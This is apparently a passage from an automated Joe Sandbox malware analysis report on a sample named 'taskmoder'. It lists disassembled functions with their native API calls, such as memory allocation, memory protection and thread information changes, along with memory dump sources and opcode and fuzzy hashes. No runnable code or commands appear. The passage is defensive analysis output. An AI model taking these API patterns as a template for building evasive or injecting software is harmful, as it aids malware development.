                                                                                        • Opcode ID: 1f01e9cdfa66d8de0a21a0a0687192b5af7f83505031403b117a5a73979aa925
                                                                                        • Instruction ID: b2ebf6fe13a3ee4c4d836487fabdf0a94b890639e35968e01fb0095d0ff2e397
                                                                                        • Opcode Fuzzy Hash: 1f01e9cdfa66d8de0a21a0a0687192b5af7f83505031403b117a5a73979aa925
                                                                                        • Instruction Fuzzy Hash: 9241ABB5D052589FCF00CFA9D984ADEFBB1BF5A310F24902AE818B7210C735A946CF54
                                                                                        Function 010AC279 Relevance: 1.6, APIs: 1, Instructions: 113filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 010AC340
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2669468079-0
                                                                                        • Opcode ID: 74591acc5ec95cd4a7ed87ef04059916d1f0217c5c7e5e9407007bf7a5196cc1
                                                                                        • Instruction ID: 8805caaca63a7d10dd3018c54377ac395572ddafd01243851a2bf892a78d9920
                                                                                        • Opcode Fuzzy Hash: 74591acc5ec95cd4a7ed87ef04059916d1f0217c5c7e5e9407007bf7a5196cc1
                                                                                        • Instruction Fuzzy Hash: 1A418AB9D002589FCF10CFA9D984AEEFBB1BF49310F10902AE819B7210D735A945CF94
                                                                                        Function 010AC280 Relevance: 1.6, APIs: 1, Instructions: 112filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 010AC340
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2669468079-0
                                                                                        • Opcode ID: 589c0b0897f76ca6c590a25f085ae0697bface8862d14b0f6cbbb6d6d9e297d8
                                                                                        • Instruction ID: b5f276156e9f7540dd71c2e4151d8fc2ec34972a9d7049b1731cbd8d1ac2a283
                                                                                        • Opcode Fuzzy Hash: 589c0b0897f76ca6c590a25f085ae0697bface8862d14b0f6cbbb6d6d9e297d8
                                                                                        • Instruction Fuzzy Hash: 3F4178B9D002589FCF00CFA9D984ADEFBB1BB49310F50902AE919B7210D735A945CFA4
                                                                                        Function 010AB9C0 Relevance: 1.6, APIs: 1, Instructions: 111memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 010ABA7D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        • Opcode ID: c47e8587ecc9e67c22e8b1b845d56ae7e08f941fb85907b8c1883bd3f01dfe85
                                                                                        • Instruction ID: 5e639838aea88c239d9135762dd86169d47e93e093b2452c802e4afe52a502e9
                                                                                        • Opcode Fuzzy Hash: c47e8587ecc9e67c22e8b1b845d56ae7e08f941fb85907b8c1883bd3f01dfe85
                                                                                        • Instruction Fuzzy Hash: CE4178B9D002589FCF10CFA9D984A9EFBB1BF59310F10902AE918B7210D735A945CFA4
                                                                                        Function 010AB88C Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 010AB945
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2706961497-0
                                                                                        • Opcode ID: 0bdd53a7bfa0a9ec899eaa1e529b039a8bf3554d72940a4ab320525a80048c3f
                                                                                        • Instruction ID: 45a73631084212c175f19d078bc12ac99fb0e6aea10244f72255d6f75ee2f9ec
                                                                                        • Opcode Fuzzy Hash: 0bdd53a7bfa0a9ec899eaa1e529b039a8bf3554d72940a4ab320525a80048c3f
                                                                                        • Instruction Fuzzy Hash: 834178B4D00258DFCF10CFAAD984ADEFBB1BB49310F10942AE919B7210D735A946CFA4
                                                                                        Function 010AB890 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 010AB945
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2706961497-0
                                                                                        • Opcode ID: 740655e0f4ac562692eeef1f2ee30ed0345bedc0f13c09d9097a01cc3a27870f
                                                                                        • Instruction ID: e7ad60b94a29aa1a14f7f81d54b4f874218236431edf437cf46786cb3b3e2384
                                                                                        • Opcode Fuzzy Hash: 740655e0f4ac562692eeef1f2ee30ed0345bedc0f13c09d9097a01cc3a27870f
                                                                                        • Instruction Fuzzy Hash: 9C4178B4D00258DFCF10CFAAD984ADEFBB5BB49310F10942AE919B7210D735A946CF64
                                                                                        Function 010AB559 Relevance: 1.6, APIs: 1, Instructions: 104nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 010AB60F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: InformationProcessQuery
                                                                                        • String ID:
                                                                                        • API String ID: 1778838933-0
                                                                                        • Opcode ID: d6e97c9b4dc7207cf49b601af903c30c6aa7cdff41c65d66056f90d21ef0353e
                                                                                        • Instruction ID: 68e0a7eeffe26a1afc7336f671edf176b260ae6a76e468924f8872e36dedd8ef
                                                                                        • Opcode Fuzzy Hash: d6e97c9b4dc7207cf49b601af903c30c6aa7cdff41c65d66056f90d21ef0353e
                                                                                        • Instruction Fuzzy Hash: 224187B8D052589FCF10CFA9D984AEEFBB1BF49310F14942AE819B7210D735A945CF64
                                                                                        Function 010AC7A0 Relevance: 1.6, APIs: 1, Instructions: 104filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 010AC857
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileInformationQueryVolume
                                                                                        • String ID:
                                                                                        • API String ID: 634242254-0
                                                                                        • Opcode ID: 3e57fe6b46b59ad2cd3d97919c0e1556679a08dafc6790e16cc0f2ae278cb627
                                                                                        • Instruction ID: 55dfcdc0ab590db709afcc2121ae9ae26115449068d5443801eefe429463dc2b
                                                                                        • Opcode Fuzzy Hash: 3e57fe6b46b59ad2cd3d97919c0e1556679a08dafc6790e16cc0f2ae278cb627
                                                                                        • Instruction Fuzzy Hash: A741ABB4D00258DFCF10CFA9D580AEEFBB1BB49310F10942AE818B7210C735A946CF54
                                                                                        Function 010AB560 Relevance: 1.6, APIs: 1, Instructions: 103nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 010AB60F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: InformationProcessQuery
                                                                                        • String ID:
                                                                                        • API String ID: 1778838933-0
                                                                                        • Opcode ID: 30dfea0587a482ae9c19bded84552b6eed8b42eb17a1b94a59eb9573c05d6a0a
                                                                                        • Instruction ID: cd882a811aa6d34421e695d6816485156c47adca51bb2d4a82337bc249c15111
                                                                                        • Opcode Fuzzy Hash: 30dfea0587a482ae9c19bded84552b6eed8b42eb17a1b94a59eb9573c05d6a0a
                                                                                        • Instruction Fuzzy Hash: FF3176B8D002589FCF10CFA9D984AEEFBB5FB49310F10942AE819B7210D735A945CFA4
                                                                                        Function 010AC7A8 Relevance: 1.6, APIs: 1, Instructions: 103filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 010AC857
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileInformationQueryVolume
                                                                                        • String ID:
                                                                                        • API String ID: 634242254-0
                                                                                        • Opcode ID: 43d4c8ec02bd867d31c9fdad49e31e49ecb133f26b9724bb0fd3b187e14123d3
                                                                                        • Instruction ID: 73845d5bd13d09f7add9bec1a0dfa4c2aa27c1ed92a3cc5adc2265264c3e78a2
                                                                                        • Opcode Fuzzy Hash: 43d4c8ec02bd867d31c9fdad49e31e49ecb133f26b9724bb0fd3b187e14123d3
                                                                                        • Instruction Fuzzy Hash: 973179B4D00258DFCF10CFA9D984A9EFBB5BB49310F10942AE819B7210D735A945CFA4
                                                                                        Function 010AC4F8 Relevance: 1.6, APIs: 1, Instructions: 99nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 010AC5A4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: InformationQuerySystem
                                                                                        • String ID:
                                                                                        • API String ID: 3562636166-0
                                                                                        • Opcode ID: 1b79528cd025918b58b46c75a7ced28e82928243865e9d079b5b86bad413f3ba
                                                                                        • Instruction ID: 4ce2dc62401beaa677bd4cbbf5708391cba4a039bf6d7307835f3124900334fe
                                                                                        • Opcode Fuzzy Hash: 1b79528cd025918b58b46c75a7ced28e82928243865e9d079b5b86bad413f3ba
                                                                                        • Instruction Fuzzy Hash: 7331AAB4D012589FCF14CFA9D984AEEFBB1BF49310F24902AE855B7210D735A946CF94
                                                                                        Function 010AC500 Relevance: 1.6, APIs: 1, Instructions: 96nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 010AC5A4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: InformationQuerySystem
                                                                                        • String ID:
                                                                                        • API String ID: 3562636166-0
                                                                                        • Opcode ID: e8e66657b7178f151951f84b76403e9b524e71985f90dc3c7c5289c8125dc1ff
                                                                                        • Instruction ID: c5b42e6697a917c2ed2c43429fd388eb7277dcab10e0655bb766a28090a6f295
                                                                                        • Opcode Fuzzy Hash: e8e66657b7178f151951f84b76403e9b524e71985f90dc3c7c5289c8125dc1ff
                                                                                        • Instruction Fuzzy Hash: E13198B8D012589FCB14CFA9D984A9EFBB1BF49310F20942AE819B7210D735A945CFA4
                                                                                        Function 010AB681 Relevance: 1.6, APIs: 1, Instructions: 95nativethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtSetInformationThread.NTDLL(?,?,?,?), ref: 010AB727
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: InformationThread
                                                                                        • String ID:
                                                                                        • API String ID: 4046476035-0
                                                                                        • Opcode ID: 13f0b124579d3a30b5ef6a872ee1ce6bae1be4c6782d0cb40e023a51a7a8e3e2
                                                                                        • Instruction ID: ecfcfb7a072d12be3c9bd4230a48e3c2e925144d3dad4ff7e8ca3eb54bd89a75
                                                                                        • Opcode Fuzzy Hash: 13f0b124579d3a30b5ef6a872ee1ce6bae1be4c6782d0cb40e023a51a7a8e3e2
                                                                                        • Instruction Fuzzy Hash: 1B31A7B8D01258DFCB10CFA9D884AEEFBB1BF49310F24942AE815B7210D775A945CFA4
                                                                                        Function 010AB688 Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtSetInformationThread.NTDLL(?,?,?,?), ref: 010AB727
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: InformationThread
                                                                                        • String ID:
                                                                                        • API String ID: 4046476035-0
                                                                                        • Opcode ID: 55d62533720d8174ecd1b44f390ac1a737519cc2083e7d6c81ac3141acc09c65
                                                                                        • Instruction ID: 2fdf75b3600f14b00cb3a404b1f6c933b524b1678d5081bad3cab52702ce833b
                                                                                        • Opcode Fuzzy Hash: 55d62533720d8174ecd1b44f390ac1a737519cc2083e7d6c81ac3141acc09c65
                                                                                        • Instruction Fuzzy Hash: 273197B8D00258DFCB14CFA9D984AAEFBB1FF49310F24942AE815B7210D775A945CFA4
                                                                                        Function 010AB798 Relevance: 1.6, APIs: 1, Instructions: 75nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: 3c7f1e1175fe178d1c4f4240f0e211c179cd15821f3583054d67f0032dcdbc22
                                                                                        • Instruction ID: c31934e966167a6ebe41eb988be59688bdb2ed4899da743ed9457b0184abcebc
                                                                                        • Opcode Fuzzy Hash: 3c7f1e1175fe178d1c4f4240f0e211c179cd15821f3583054d67f0032dcdbc22
                                                                                        • Instruction Fuzzy Hash: 3731DAB4D002589FCB10CFA9D580AEEFBB0EF49314F24802AE419B7210C735A942CFA4
                                                                                        Function 010AB7A0 Relevance: 1.6, APIs: 1, Instructions: 73nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2997248781.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_10a0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: 06edf2981adeee1ea1de2d8c4ff3ef87726c8cac1b684d6286d050dbc9477c6f
                                                                                        • Instruction ID: d012194b15d27fc8785a5026e36a6f73396b14016adfc3334c7211287e545b9c
                                                                                        • Opcode Fuzzy Hash: 06edf2981adeee1ea1de2d8c4ff3ef87726c8cac1b684d6286d050dbc9477c6f
                                                                                        • Instruction Fuzzy Hash: FB3198B4D012189FCB14CFAAD984AAEFBB5AB49310F10942AE819B7250D735A941CFA4
                                                                                        Function 00BDA3E0 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2918806066.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_bd0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: d*
                                                                                        • API String ID: 0-2562040650
                                                                                        • Opcode ID: 82ed047f5ea067db5041b94e210e58ea31f9ceb4b633f9e20b2f4429d0b5b1d8
                                                                                        • Instruction ID: 7d6b3aad86626db1fec9aa2a754f90f2c6843620107ac99ecba5a2680aaa4f75
                                                                                        • Opcode Fuzzy Hash: 82ed047f5ea067db5041b94e210e58ea31f9ceb4b633f9e20b2f4429d0b5b1d8
                                                                                        • Instruction Fuzzy Hash: EFE1BAB5E0061A8FCB54CFA9D8826AEFBF1FF48314F10816AD609A7350D7349A85CF91
                                                                                        Function 029248F8 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 59C
                                                                                        • API String ID: 0-641190316
                                                                                        • Opcode ID: a0cceaccacf4443a72eb5d04da942e9d84a40b18bf886b4dcb3c8b4c17c72818
                                                                                        • Instruction ID: cdbae553c4736cb119c831e227ea36fb537eac0af7cbe9050544e71271e65c26
                                                                                        • Opcode Fuzzy Hash: a0cceaccacf4443a72eb5d04da942e9d84a40b18bf886b4dcb3c8b4c17c72818
                                                                                        • Instruction Fuzzy Hash: 3BA1D9B4E0021A8FDB44CFA9C8816EEBBF2BF88310F249569D508E7355D7749A85CF90
                                                                                        Function 00BDE8B4 Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2918806066.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_bd0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 9a9
                                                                                        • API String ID: 0-2504472615
                                                                                        • Opcode ID: 911701c463d62dd679df4061351a0ebd7998cef68eb24eea13371b9fdadda2cb
                                                                                        • Instruction ID: f46844105242e59b24f9a7ff20729ca94c9b45f34caac899cf9a24f9d0147ab6
                                                                                        • Opcode Fuzzy Hash: 911701c463d62dd679df4061351a0ebd7998cef68eb24eea13371b9fdadda2cb
                                                                                        • Instruction Fuzzy Hash: 3CA1D074D0121ACFCB49DFA8C8949AEFBF2BF88300F14856AE425AB361D7759945CF90
                                                                                        Function 00BDE8D8 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2918806066.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_bd0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 9a9
                                                                                        • API String ID: 0-2504472615
                                                                                        • Opcode ID: 2376673e9fa9c4ed3c62add316ae4890611776682ca71ae75b6146671a3c7c30
                                                                                        • Instruction ID: 6ead112e0109c20534c508fa4d5747773840b694c2fe6a1ebbd06c3df48c6205
                                                                                        • Opcode Fuzzy Hash: 2376673e9fa9c4ed3c62add316ae4890611776682ca71ae75b6146671a3c7c30
                                                                                        • Instruction Fuzzy Hash: F1919F74D1121A8FCB48DFA8D9949AEBBF2FF88310F10856AE425AB360D7759941CF90
                                                                                        Function 00A000CB Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $]q
                                                                                        • API String ID: 0-1007455737
                                                                                        • Opcode ID: 9a9d90bd7e95d42977a3ec7233f0918edde3dc6069f4dda6a6bac37ab07a39d5
                                                                                        • Instruction ID: 132531705585ca65fdcaf30a71d1dead92162a2294da2dbf18c6539c2b0b862a
                                                                                        • Opcode Fuzzy Hash: 9a9d90bd7e95d42977a3ec7233f0918edde3dc6069f4dda6a6bac37ab07a39d5
                                                                                        • Instruction Fuzzy Hash: C221E770D0925CDFCB16CFA4D940AADBFB0BB06301F6581AAD444AB2A2D3344E45DB51
                                                                                        Function 00A00324 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2880671343.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_a00000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $]q
                                                                                        • API String ID: 0-1007455737
                                                                                        • Opcode ID: 0717e0f3fc0f798fa0d3519558a01623306f8b792bfaf3b98744597e5e6e9093
                                                                                        • Instruction ID: 601b280fbfe34f3ad0b5e13b492b7dccb01c8769d94079936af60abe9751f690
                                                                                        • Opcode Fuzzy Hash: 0717e0f3fc0f798fa0d3519558a01623306f8b792bfaf3b98744597e5e6e9093
                                                                                        • Instruction Fuzzy Hash: CF110CB4D192499FCB16CFA8D8507ADBFF0BF06301F1545E6C454A72A1D3344A40CB66
                                                                                        Function 02927998 Relevance: 1.0, Instructions: 951COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2446563c874fb6b703a3116f2b0635fca9d0e12a5315bd33be05a9dc6cc5b38d
                                                                                        • Instruction ID: a7eec0e2dab4d9f0ad5ac273e6fa5289af3e78e251d5d491ab1113498b986a32
                                                                                        • Opcode Fuzzy Hash: 2446563c874fb6b703a3116f2b0635fca9d0e12a5315bd33be05a9dc6cc5b38d
                                                                                        • Instruction Fuzzy Hash: 79A2F774905224CFDB24DF68C988BE9BBB1FB49305F1484E9D849AB356DB309E86CF50
                                                                                        Function 00BDB060 Relevance: .5, Instructions: 453COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2918806066.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_bd0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 27bbe0b9cbea2e608873928f637e8b41a612c57000594e4a40683d3728e720f3
                                                                                        • Instruction ID: 1acd74025a89df0b122a282783bc7e5f14bce98233b7768f39d41416e438e330
                                                                                        • Opcode Fuzzy Hash: 27bbe0b9cbea2e608873928f637e8b41a612c57000594e4a40683d3728e720f3
                                                                                        • Instruction Fuzzy Hash: 90328E74E00219CFDB68DFA9C955ADDBBF2AB88300F14C1AAD419B7354E7309A85CF64
                                                                                        Function 0292C608 Relevance: .4, Instructions: 412COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 83ec957a43e1e1d78bcd423ee6ac227b6fe380c093e679167ff6086616eaf4a0
                                                                                        • Instruction ID: 7aca899433e37c8eecd7cbb9ddcbb12fe56e7190613bba50a24eefaf04f1339b
                                                                                        • Opcode Fuzzy Hash: 83ec957a43e1e1d78bcd423ee6ac227b6fe380c093e679167ff6086616eaf4a0
                                                                                        • Instruction Fuzzy Hash: 4202F4B0D00229CFDB20CFA8C981BDDBBB1BF49304F1095AAD409B7254EB749A89CF55
                                                                                        Function 0292D438 Relevance: .4, Instructions: 387COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.3016913606.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_2920000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 61c00dfb021e8e5a940c923b35f001d84a794b22e479ab75b1ab8b706acd7dab
                                                                                        • Instruction ID: 6d7ef0fa3858bcaa6987c9e3d2c53b881dbfe765b0c555092c6a556dee86290c
                                                                                        • Opcode Fuzzy Hash: 61c00dfb021e8e5a940c923b35f001d84a794b22e479ab75b1ab8b706acd7dab
                                                                                        • Instruction Fuzzy Hash: CDF1F5B4D01229CFDB20CFA8C985B9DBBF5BF49304F1091AAD409B7258EB749989CF51
                                                                                        Function 00BDB050 Relevance: .3, Instructions: 339COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2918806066.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_bd0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3f2adc1aec3b3cde6774100363564d404446605eefa48405e99c680e20e80216
                                                                                        • Instruction ID: 7bc4cfa706c347235b0f36aa4bc9733c260e15bfddb1297ffd9cbc42ab09c27b
                                                                                        • Opcode Fuzzy Hash: 3f2adc1aec3b3cde6774100363564d404446605eefa48405e99c680e20e80216
                                                                                        • Instruction Fuzzy Hash: 72F19075E00219CFDB68DFA9C855ADDBBF2AB88300F14C1AAD419B7354E7309985CF64
                                                                                        Function 00BD9CA8 Relevance: .2, Instructions: 188COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001F.00000002.2918806066.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_31_2_bd0000_taskmoder.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ebb754654fed0f3c8191cc2809db4f3163ad7164c3f9014a0bceec35e6dd0560
                                                                                        • Instruction ID: 1e56a8a905418aad2daf9a711c1a75a8bd756aae0476221be6efa481e88a5459
                                                                                        • Opcode Fuzzy Hash: ebb754654fed0f3c8191cc2809db4f3163ad7164c3f9014a0bceec35e6dd0560
